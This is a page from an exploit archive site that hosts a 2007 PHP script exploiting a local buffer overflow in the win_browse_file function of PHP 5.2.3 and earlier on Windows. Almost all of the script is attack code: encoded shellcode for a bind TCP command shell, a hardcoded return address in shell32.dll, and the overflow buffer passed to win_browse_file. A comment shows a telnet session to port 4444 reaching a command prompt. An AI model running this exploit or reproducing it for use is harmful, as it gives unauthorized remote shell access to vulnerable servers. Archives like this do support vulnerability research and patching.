what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

php523browse-overflow.txt

php523browse-overflow.txt
Posted Aug 24, 2007
Authored by Inphex

PHP versions 5.2.3 and below win_browse_file local buffer overflow exploit.

tags | exploit, overflow, local, php
SHA-256 | eed40468d521dbe25dc18d44f115c6ea69433c0c26f75d387a8c86a96659bcca
Download | Favorite | View

php523browse-overflow.txt

Change Mirror Download
<?php
/*
Inphex
317 Bytes , Windows Command Shell  Bind TCP Inline , Architecture x86 , Windows TinyXP - vm.
GET /script.php HTTP/1.1\n

telnet 192.168.2.32 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\apache>
7ffdf020  7c911005 7c9110ed 00000001 00000000

shoutz go to Kevin Finisterre
*/

if(!function_exists('win_browse_file')) {
die('win32std extension is not available');
}
$shellcode=
"\x2b\xc9\xb1\x51\xba\xbb\xb2\xd5\x31\xda\xda\xd9\x74\x24\xf4".
"\x58\x31\x50\x0e\x83\xc0\x04\x03\xeb\xb8\x37\xc4\xf7\xd7\x5c".
"\x6a\xef\xd1\x5c\x8a\x10\x41\x28\x19\xca\xa6\xa5\xa7\x2e\x2c".
"\xc5\x22\x36\x33\xd9\xa6\x89\x2b\xae\xe6\x35\x4d\x5b\x51\xbe".
"\x79\x10\x63\x2e\xb0\xe6\xfd\x02\x37\x26\x89\x5d\xf9\x6d\x7f".
"\x60\x3b\x9a\x74\x59\xef\x79\x5d\xe8\xea\x09\xc2\x36\xf4\xe6".
"\x9b\xbd\xfa\xb3\xe8\x9e\x1e\x45\x04\x23\x33\xce\x53\x4f\x6f".
"\xcc\x02\x4c\x5e\x37\xa0\xd9\xe2\xf7\xa2\x9d\xe8\x7c\xc4\x01".
"\x5c\x09\x65\x31\xc0\x66\xe8\x0f\xf2\x9a\xa4\x70\xdc\x05\x16".
"\xe8\x89\xfa\xaa\x9c\x3e\x8e\xf8\x03\x95\x8f\x2d\xd3\xde\x9d".
"\x32\x18\xb1\xa2\x1d\x01\xb8\xb8\xc4\x3c\x57\x4a\x0b\x6b\xc2".
"\x49\xf4\x43\x7a\x97\x03\x96\xd6\x70\xeb\x8e\x7a\x2c\x40\x7d".
"\x2e\x91\x35\xc2\x83\xea\x6a\xa2\x4b\x04\xd7\x4c\xdf\xaf\x06".
"\x05\xb7\x0b\xd2\x55\x8f\x03\x1c\x43\x65\xbc\xb3\x3e\x85\x6c".
"\x5b\x64\xd4\xa3\x75\x33\xd8\x6a\xd6\xee\xd9\x43\xb1\xf5\x6f".
"\xe2\x0b\xa2\x90\x3c\xdb\x18\x3b\x94\x23\x70\x50\x7e\x3b\x09".
"\x91\x06\x94\x16\xcb\xac\xe5\x38\x92\x24\x7e\xde\x33\xda\x13".
"\x97\x21\x76\xbc\xfe\x80\x4b\xb5\xe7\xb9\x17\x4f\x05\x0c\x58".
"\xbc\x63\x91\x1a\x6e\x8d\x2c\xb7\xe3\xfc\xcb\xff\xa8\x55\x80".
"\x68\xdd\x57\x64\x7e\xde\xd2\xcf\x80\xf6\x47\x87\x2c\xa6\x26".
"\x76\xbb\x49\x99\x29\x6e\x1b\xe6\x1a\xf8\x36\xc1\x9e\x37\x1b".
"\x0e\x76\xad\x63\x0f\x40\xcd\x4c\x64\xf8\xcd\xee\xbe\x63\xd1".
"\x27\x6c\x93\xfd\xa0\x60\xe1\xfa\x6f\xd3\x09\xd4\x6f\x03\xf5".
"\xd9\x8f";

$eip = "\xDC\x1C\x9C\x7C"; //shell32.dll
win_browse_file( 1, NULL, str_repeat( "A", 260 )."".$eip."XXXX\x20\xf0\xfd\x7f".str_repeat("C",500).$shellcode.str_repeat("C",300), NULL, array( "*" => "*.*" ) );
?>

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close